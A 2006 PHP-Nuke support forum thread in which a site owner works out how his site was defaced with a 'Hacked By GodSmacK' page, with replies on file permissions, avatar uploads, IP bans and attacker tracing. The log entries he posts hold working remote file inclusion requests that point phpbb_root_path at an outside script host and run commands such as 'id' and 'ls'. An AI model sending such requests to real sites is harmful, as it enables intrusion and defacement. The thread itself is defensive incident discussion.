Hacked By GodSmacK?

New Member Joined: Dec 11, 2005 Posts: 9

Raven,

Hey this is Scott. Been running the security patches you installed for months now and things are going great. No more admin issues etc.. I run Nuke 7.0

Today I'm not sure how they did it because my index.php file is ok, but if you load my site directly typing in [ Only registered users can see links on this board! Get registered or login! ] I get a screen that says:

=====================

Hacked By GodSmacK
[ Only registered users can see links on this board! Get registered or login! ]

=====================

If I type [ Only registered users can see links on this board! Get registered or login! ]

My site loads perfectly as do all the other pages? How are they doing this and how can i correct it? PM me when you get a second.

Thanks,

Scott

Posted: Thu Jun 08, 2006 3:43 pm

check to see if there is an index.html

as it will try to find that first

Posted: Thu Jun 08, 2006 3:45 pm

This post is probably in the wrong area for starters and I apologize for that.

Well I kind of figured out what was changed.

My Index.php files are file, but some how they changed my index.html file to this:

Code:

  Can't post the code, but it was changed.

Same questions applies, how did they do that and how can I stop it?

Thanks,

Scott

Posted: Thu Jun 08, 2006 3:46 pm

Yep that was it, but not sure how to keep them out.

Site Admin Joined: Jun 04, 2004 Posts: 6432

Do you know if the permissions were set to allow writing? Most likely, they scanned your site to find files that could be overwritten, then used another attack to overwrite the file.

Posted: Thu Jun 08, 2006 3:50 pm

I went back to my original back up of my site that i did two days ago and i did not have an index.html file in my back up.

Could they have inserted that?

I deleted that file and site is back on track normally. Weird...

Posted: Thu Jun 08, 2006 3:53 pm

Usually not without FTP or control panel access, unless you use a non-standard module that allows uploads.

Posted: Thu Jun 08, 2006 4:13 pm

im not sure how but i think they wrote a php code...fopen ussually does the trick..and wrote to it....do u allow anything uploaded to ur site?

Posted: Thu Jun 08, 2006 4:29 pm

Yes the only thing i allow to be uploaded are the Avatars. Funny this started to happen all of a sudden becasue i just turned on the upload Avatar function.

Do you think that is causing the issue?

Posted: Thu Jun 08, 2006 4:33 pm

im goin to try a hack on mysite to see.

Posted: Thu Jun 08, 2006 4:44 pm

Here is the Log entry that showed up around the time it happened:

Code:

85.106.213.224





Get-Address


/modules/Forums/admin/index.php?phpbb_root_path=http%3A%2F%2Fexploitarsivi.atspace.com%2F030.txt%3Fcmd&act=ls&d=%2Fhome%2Fsweptlin%2Fpublic_html%2F&sort=0a

Posted: Thu Jun 08, 2006 4:52 pm

This is the last entry and looks like this is the one that did it, maybe i shouldn't be posting this...:

Code:

85.106.213.224 





/modules/Forums/admin/index.php?phpbb_root_path=http://exploitarsivi.atspace.com/030.txt?cmd=id

I did go ahead and ban thier IP range.

85.106.128.0 - 85.106.255.255
netname: TurkTelekom
descr: Turk Telekom ADSL-alcatel
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
notify: ***@telekom.gov.tr
changed: ***@telekom.gov.tr 20051026
source: RIPE

Posted: Thu Jun 08, 2006 5:02 pm

after attempting that on my site...sentinel caught me...with ease and i tried to upload somethin to my avatars that was actually a script renamed but it wouldnt take.

I tried every input on my site...and nothing and i mean nothing would take...now im not very knowledgable on hacks..but i can tell...no1 will input a script that will function into any inputs i got...sorry to say...im at a dead end

Sells PC To Pay For Divorce Joined: Posts: 5661

well this is one of the most common they use...
but its not only towards phpnuke nuke....its targeted to phpbb standalone,postnuke,my-gallery,gallery etc....

Involved Joined: Apr 05, 2006 Posts: 263

is their a way of testing the security myself on my site so i know i cant be hacked anyway at all.

i got 7.6 raven 2.2.2 all updates , its catching alot , but i want all holes filled (not mine lol)

the only add-ons i got installed is shout box 8.5 and doant o meter (not working as yet) and server monitor(game monitor )

Posted: Sat Aug 19, 2006 2:11 am

There are lots of vulnerabilities you can search for... we won't post them here.

Posted: Sun Aug 20, 2006 5:57 pm

Rgr that evaders99, was`nt asking for the code i got me a hacker and all his codes thx Very Happy

since my asking , just to test ..anyways,

i turned off sentinel ...AAhhh i here you shout, well i switched database to one called
catch_memy_hacker , with a 1 month old backup
and all new folders he could play with killing me

insert really Evil laugh**

.....It worked he used lots of code thorugh address bar before he could get in, (i will send you the printscreens/codes if ya really want it to see if its something new) only you guys though..he``s No script kiddie me thinks??? i think he knows exactly what he does himself

his IP is 81.76.121.209 which is leeds ..but its only his host IP not his ...how do i get him please? pm me if needed

Posted: Sun Aug 20, 2006 6:42 pm

You need to look closely at the string manipulation he used, you will probably find that he came from site x and connected with site y which is compromised and used that to eventually get to your site.
I'm seeing this more and more often.
Th problem with this type of attack is if you rely solely on the referer, it is going to give you the wrong data (site y in this example).

Posted: Sun Aug 20, 2006 10:18 pm

rgr that , ibanned this IP, but i want this guy really bad anyway to get catch him at all , ill try anything for testing purposes

Posted: Mon Aug 21, 2006 6:47 am

Maybe try adding a string in the string blocker. Problem is, though, they may even just change that as they use someone else's site they have compromised to issue a new attack. It is endless... all that "talent" wasted.

Posted: Tue Aug 22, 2006 5:24 pm

well i found out by pure chance that my abuse/abuse.html works lol